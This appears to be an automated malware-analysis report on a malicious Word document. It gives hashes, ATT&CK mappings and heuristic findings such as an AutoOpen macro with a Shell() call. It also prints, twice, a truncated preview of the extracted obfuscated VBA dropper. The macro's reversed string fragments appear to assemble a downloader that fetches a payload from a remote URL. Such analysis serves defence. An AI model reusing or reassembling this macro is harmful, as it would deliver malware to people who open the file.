Office (OLE) malware analysis — malicious · 6d0e9022ce78eab8

MALICIOUS

Office (OLE)

99.0 KB Created: 2018-02-07 21:29:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 0429f5f6a474e76de1c3f5a7c82ce27b SHA-1: b51d6891e07ce8b2d079d7bb47bdbf50f8fadff9 SHA-256: 6d0e9022ce78eab8cb26333a5664d7210c82254903e352f2ccad5fa5b90a143d

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further confirms its malicious nature, suggesting a phishing lure designed to drop further malicious content.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 101,376 bytes but its declared streams total only 24,689 bytes — 76,687 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22937 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22937 bytes
SHA-256: `3ce3b60d73c2a9f803d68d85d72b1c4128e9a83bc9aa608ce6e7a177cd5bba5b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SjfNhTcsXmZi" Sub AutoOpen() On Error Resume Next vXwPjfBTi = NGUPQtGGlrz - KEvKnUO / (1722276 + XSdXqUnMR - 8352868 + MVYcpobPSizk) IuNuUVshE = NpnqraYTuT - NopjSVwswqlYhU / (5573964 + aTrZJimHiow - 9472217 + qzkjlvF) YOBztpGjc = FWOzwADtp - BhzdXBqHqBrw / (4924884 + EMRrfUYDfQ - 6755718 + iEszjmvMErQ) Application.Run "KmtOwvuIj", BCjHwJisim XbswwsbZI = rsmiLOVKwBhuvS - PrUFBNSNvuQm / (4301292 + KEqafrLGRV - 4603841 + BFpjcfaMjBG) UHjYfqnvb = lnwqUQbaIazhbM - XMSkMKpJw / (4332587 + wSjPdawbP - 3482832 + sHOwmbbHmfWLI) End Sub Function BCjHwJisim() On Error Resume Next WwwEVZoAd = RzjbCBShwASuC - UPEQMsuvEwBr / (2446531 + iAURiGQ - 179109 + QbItjdpElC) Gjkwvjb = GzIPPtuWvk - LoMCwjBMvST / (8273896 + pEzOSOrPpozjr - 965767 + oMuFopP) nhswkX = jdjJDYGFnG - ZLufDhsLWA / (2373723 + FbwYjYNCzZ - 7004458 + llEnqiiMZ) bczCkKPFUG = qXjFIaNMfbm + Mid(StrReverse("lYLoUhOamVFqJwobfjIOj3]RahF"), 2, 5) MGjRoOKUfN = GbhEAXhZEX - abuRcEUnRzwivH / (5851398 + hpGTjRw - 5850264 + XjqLAnVz) CrFiP = QSlZwrKGBUKs - zVUAkzETJdQH / (956679 + dcRMbjPrLR - 1468899 + OIZQdURllVrAD) qBWZUqj = uNHpVSrWji - IjJWGJCsqjvt / (8700568 + wpTjIkRJDoCjWv - 7948236 + sbvjUkI) pHUMNNlLjvj = frujrYwitT + Mid(StrReverse("JksjLjOSTXjddTwtZjkrMXSCjLMBL8moc'+'.21Usj+UsjrYL8+YL8eYL8+YL8velYL8+YL8jwvNRZCi"), 9, 44) QupORcVz = ZdXmYtTzfUUWn - DoqTwNfL / (6222468 + DwwJwPp - 6605275 + jWMiFDCNVF) uiihYTifQ = uJXhDXzjVAKNw - jbwJCQfmA / (1419397 + rKlQvAJGsKuZ - 2943914 + ZRJMVVI) ZzJmc = LWbFDToII - QvMNLPZA / (239942 + EJpChCcw - 4277586 + fldczPoqwp) jmJzGiaFO = fLoHMozTO + Mid(StrReverse("ztXwasoY'+'L8+YL8roigelocVzZ+VzZ/'+'YL8+Y'+'L8/'+':ptYKDLzoidjNwCwJjotGrFmA"), 22, 50) AOLhclMrL = UUAKChZXAqqm - iiSjNwbiELpV / (1412921 + sOIQsdm - 2079922 + cRwiPTvzb) OjipEwTf = SGiAKwJREQJKou - jJsazJwTNqS / (3254119 + LPJMOZozO - 2611950 + RiLiuHRcCFjKCY) csiqY = mWnRKrhvFoG - wPGiRvuIPwOYGY / (8092354 + IcFGnkmSK - 9433969 + GknFunK) DjzYsrlzft = jBkJTuMGt + Mid(StrReverse("FNc[]gNIrTs[,'BZKzdomUwqmqnMENrzojLAPRu"), 24, 14) kajVusIp = LmBSndjAJ - cnUUsnYb / (8720855 + kvCdThLqzX - 4339015 + KwlRERzbKnAKkH) oBESW = wWVsmuod - jYzFRsDmo / (5788957 + YibiGbRJzur - 8663065 + aPUcikDV) NIOAwODAHj = WhjRuKSjO - GiiNumlKdf / (6205892 + rfofCXbHEa - 1507507 + MtCohHq) OizqvwAqN = MvaROIQOoI + Mid(StrReverse("NOQIwpsGMvHVYpCVRHCfVzZUsjVzZ EC'+'aLperc-421]rAhc[,VzZ8r'+'xVzZ ECa'+'Lperc-63]rAhc[,)55]'+'rAhc[+58]rAhc[+9'+'4]rAhc[( ECaLperc- )VzZ)UsjXVzZ+VzZUsj+]5[cilbuP:vne7UPv"), 3, 149) rKPsjqzQYa = aqlBqAdOHv - GRfWcABj / (9302188 + VoSoVsHnAzk - 2714937 + zRULDBLTzvF) bLwShhzo = EHKOBYGzzE - TMUIVaG / (9494904 + smjFIowhkJ - 4240339 + MPRlwZzZiQhuPA) CXbGNL = itqstzihRaFFMZ - MniIGzCXYB / (1429171 + tbElpIpPnu - 3232388 + wihAKrTmzFE) piVMAD = jVnjrBZqt + Mid(StrReverse("ifw)'+'(YL8+YL8yt9gNnYL8+YL8mXUsj+UsjinmXrtSYL8+YL8'+'VzZ+VzZoTyt9.cfsaYL8+YL8n3aYL8+'+'YL8(ytYL8+YL89elUsj+UsjYL8+YUsj+UsjL8Usj+UVzZ+VzZsjnmXYUsj+UsjL8+YL8IFdYLMvXZcEFB"), 10, 157) zlWZtjR = zWKlRWFMc - BMhiUYoXK / (4893446 + PnjRdarWpboV - 5366420 + QoTmXGvRmi) FDSHwMGpn = jIRBAiBP - hjbTowOqmnNr / (1055846 + EjUknTnw - 187768 + HtRaUpt) NiipFju = FvojNzzarEiw - SiwMSjzNw / (8608628 + iWMvfoVzualK - 4543090 + VUnNbiTCoo) SWnvIot = MHtCjWRqlZoFMp + Mid(StrReverse("njjdAEcVz'+'Z+VzZ,YL8+YL8sbGGuk"), 7, 18) cUZwkvd = qnCuDjhDpjUYow - KAVJQjiY / (6166643 + aTozBdHT - 4940651 + hkSXzmwwHuw) HdTzXI = FwkZnsoSHO - kcPsEoDMFP / (3395546 + ZhzKdhkQlOC - 2862742 + OcqPiHXSOhuku) qQKfTf = KDiqJnRLrpiKkX - lWaAApLNzaHuML / (9902828 + ZjnaNCX - 8529688 + aDkAjUXzUdL) oBOIsdz = VNBIvZICE + Mid(StrReverse("ZWWEVfLbvZHj+XaQLRuz"), 5, 5) fMaSwvlw = smIbzwkiwiYama - QGkurioi / (8031813 + icXRIqiUDsOXt - 4986889 + kuMmLTS) HslHTFkGzQK = dUJRwOREDS - OUNRqsqFihzt / (2535576 + sGnbwiV ... (truncated)

SHA-256: 3ce3b60d73c2a9f803d68d85d72b1c4128e9a83bc9aa608ce6e7a177cd5bba5b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SjfNhTcsXmZi"
Sub AutoOpen()
On Error Resume Next
vXwPjfBTi = NGUPQtGGlrz - KEvKnUO / (1722276 + XSdXqUnMR - 8352868 + MVYcpobPSizk)
IuNuUVshE = NpnqraYTuT - NopjSVwswqlYhU / (5573964 + aTrZJimHiow - 9472217 + qzkjlvF)
YOBztpGjc = FWOzwADtp - BhzdXBqHqBrw / (4924884 + EMRrfUYDfQ - 6755718 + iEszjmvMErQ)
Application.Run "KmtOwvuIj", BCjHwJisim
XbswwsbZI = rsmiLOVKwBhuvS - PrUFBNSNvuQm / (4301292 + KEqafrLGRV - 4603841 + BFpjcfaMjBG)
UHjYfqnvb = lnwqUQbaIazhbM - XMSkMKpJw / (4332587 + wSjPdawbP - 3482832 + sHOwmbbHmfWLI)
End Sub
Function BCjHwJisim()
On Error Resume Next
WwwEVZoAd = RzjbCBShwASuC - UPEQMsuvEwBr / (2446531 + iAURiGQ - 179109 + QbItjdpElC)
Gjkwvjb = GzIPPtuWvk - LoMCwjBMvST / (8273896 + pEzOSOrPpozjr - 965767 + oMuFopP)
nhswkX = jdjJDYGFnG - ZLufDhsLWA / (2373723 + FbwYjYNCzZ - 7004458 + llEnqiiMZ)
bczCkKPFUG = qXjFIaNMfbm + Mid(StrReverse("lYLoUhOamVFqJwobfjIOj3]RahF"), 2, 5)
MGjRoOKUfN = GbhEAXhZEX - abuRcEUnRzwivH / (5851398 + hpGTjRw - 5850264 + XjqLAnVz)
CrFiP = QSlZwrKGBUKs - zVUAkzETJdQH / (956679 + dcRMbjPrLR - 1468899 + OIZQdURllVrAD)
qBWZUqj = uNHpVSrWji - IjJWGJCsqjvt / (8700568 + wpTjIkRJDoCjWv - 7948236 + sbvjUkI)
pHUMNNlLjvj = frujrYwitT + Mid(StrReverse("JksjLjOSTXjddTwtZjkrMXSCjLMBL8moc'+'.21Usj+UsjrYL8+YL8eYL8+YL8velYL8+YL8jwvNRZCi"), 9, 44)
QupORcVz = ZdXmYtTzfUUWn - DoqTwNfL / (6222468 + DwwJwPp - 6605275 + jWMiFDCNVF)
uiihYTifQ = uJXhDXzjVAKNw - jbwJCQfmA / (1419397 + rKlQvAJGsKuZ - 2943914 + ZRJMVVI)
ZzJmc = LWbFDToII - QvMNLPZA / (239942 + EJpChCcw - 4277586 + fldczPoqwp)
jmJzGiaFO = fLoHMozTO + Mid(StrReverse("ztXwasoY'+'L8+YL8roigelocVzZ+VzZ/'+'YL8+Y'+'L8/'+':ptYKDLzoidjNwCwJjotGrFmA"), 22, 50)
AOLhclMrL = UUAKChZXAqqm - iiSjNwbiELpV / (1412921 + sOIQsdm - 2079922 + cRwiPTvzb)
OjipEwTf = SGiAKwJREQJKou - jJsazJwTNqS / (3254119 + LPJMOZozO - 2611950 + RiLiuHRcCFjKCY)
csiqY = mWnRKrhvFoG - wPGiRvuIPwOYGY / (8092354 + IcFGnkmSK - 9433969 + GknFunK)
DjzYsrlzft = jBkJTuMGt + Mid(StrReverse("FNc[]gNIrTs[,'BZKzdomUwqmqnMENrzojLAPRu"), 24, 14)
kajVusIp = LmBSndjAJ - cnUUsnYb / (8720855 + kvCdThLqzX - 4339015 + KwlRERzbKnAKkH)
oBESW = wWVsmuod - jYzFRsDmo / (5788957 + YibiGbRJzur - 8663065 + aPUcikDV)
NIOAwODAHj = WhjRuKSjO - GiiNumlKdf / (6205892 + rfofCXbHEa - 1507507 + MtCohHq)
OizqvwAqN = MvaROIQOoI + Mid(StrReverse("NOQIwpsGMvHVYpCVRHCfVzZUsjVzZ EC'+'aLperc-421]rAhc[,VzZ8r'+'xVzZ  ECa'+'Lperc-63]rAhc[,)55]'+'rAhc[+58]rAhc[+9'+'4]rAhc[(  ECaLperc-  )VzZ)UsjXVzZ+VzZUsj+]5[cilbuP:vne7UPv"), 3, 149)
rKPsjqzQYa = aqlBqAdOHv - GRfWcABj / (9302188 + VoSoVsHnAzk - 2714937 + zRULDBLTzvF)
bLwShhzo = EHKOBYGzzE - TMUIVaG / (9494904 + smjFIowhkJ - 4240339 + MPRlwZzZiQhuPA)
CXbGNL = itqstzihRaFFMZ - MniIGzCXYB / (1429171 + tbElpIpPnu - 3232388 + wihAKrTmzFE)
piVMAD = jVnjrBZqt + Mid(StrReverse("ifw)'+'(YL8+YL8yt9gNnYL8+YL8mXUsj+UsjinmXrtSYL8+YL8'+'VzZ+VzZoTyt9.cfsaYL8+YL8n3aYL8+'+'YL8(ytYL8+YL89elUsj+UsjYL8+YUsj+UsjL8Usj+UVzZ+VzZsjnmXYUsj+UsjL8+YL8IFdYLMvXZcEFB"), 10, 157)
zlWZtjR = zWKlRWFMc - BMhiUYoXK / (4893446 + PnjRdarWpboV - 5366420 + QoTmXGvRmi)
FDSHwMGpn = jIRBAiBP - hjbTowOqmnNr / (1055846 + EjUknTnw - 187768 + HtRaUpt)
NiipFju = FvojNzzarEiw - SiwMSjzNw / (8608628 + iWMvfoVzualK - 4543090 + VUnNbiTCoo)
SWnvIot = MHtCjWRqlZoFMp + Mid(StrReverse("njjdAEcVz'+'Z+VzZ,YL8+YL8sbGGuk"), 7, 18)
cUZwkvd = qnCuDjhDpjUYow - KAVJQjiY / (6166643 + aTozBdHT - 4940651 + hkSXzmwwHuw)
HdTzXI = FwkZnsoSHO - kcPsEoDMFP / (3395546 + ZhzKdhkQlOC - 2862742 + OcqPiHXSOhuku)
qQKfTf = KDiqJnRLrpiKkX - lWaAApLNzaHuML / (9902828 + ZjnaNCX - 8529688 + aDkAjUXzUdL)
oBOIsdz = VNBIvZICE + Mid(StrReverse("ZWWEVfLbvZHj+XaQLRuz"), 5, 5)
fMaSwvlw = smIbzwkiwiYama - QGkurioi / (8031813 + icXRIqiUDsOXt - 4986889 + kuMmLTS)
HslHTFkGzQK = dUJRwOREDS - OUNRqsqFihzt / (2535576 + sGnbwiV
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.